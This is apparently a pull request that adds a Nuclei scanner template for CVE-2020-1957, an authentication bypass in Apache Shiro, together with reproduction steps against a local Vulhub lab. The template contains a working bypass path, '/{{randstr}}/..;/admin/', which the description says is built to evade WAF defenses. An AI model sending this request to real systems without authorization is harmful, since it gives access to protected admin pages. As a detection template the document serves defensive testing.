### PR TITLE
feat: Add template for CVE-2020-1957

### DIFF
--- a/http/cves/2020/CVE-2020-1957.yaml
+++ b/http/cves/2020/CVE-2020-1957.yaml
@@ -1,0 +1,31 @@
+id: cve-2020-1957
+
+info:
+  name: Apache Shiro < 1.5.2 - Authentication Bypass
+  author: wn147
+  severity: high
+  description: |
+    Exploits a discrepancy in URL interpretation between Shiro and Spring, allowing authentication bypass. Combines path normalization and path parameters to evade WAF defenses.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-1957
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2020-1957
+  tags: cve,cve2020,shiro,bypass,auth-bypass,vulhub
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/{{randstr}}/..;/admin/"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        part: body
+        words:
+          - "Account Info Page for: World!"


### PR DESCRIPTION
Template / PR Information
Added template for CVE-2020-1957, which detects an authentication bypass vulnerability in Apache Shiro when used with frameworks like Spring.

This template uses an advanced pattern (/{{randstr}}/..;/admin/) that combines path normalization and path parameters to effectively bypass defenses in certain environments. The template has been successfully tested against the official Vulhub lab for this CVE.

References: https://nvd.nist.gov/vuln/detail/CVE-2020-1957

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO


#### Additional Details (leave it blank if not applicable)

Test Environment:
This template was validated using the official [Vulhub environment for CVE-2020-1957](https://github.com/vulhub/vulhub/tree/master/shiro/CVE-2020-1957).

How to Reproduce:
```
git clone https://github.com/vulhub/vulhub.git
cd vulhub/shiro/CVE-2020-1957
docker-compose up -d
```

Run Nuclei with this template:
`nuclei -u http://127.0.0.1:8080 -t http/cves/2020/CVE-2020-1957.yaml`

Matched Response Snippet:
The template successfully matches on the following HTTP response:

```
HTTP/1.1 200 
Content-Type: text/html;charset=UTF-8
Content-Language: en
Transfer-Encoding: chunked
Date: Tue, 30 Sep 2025 09:19:30 GMT

...
<h1>Account Info Page for: World!</h1>
...
```

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)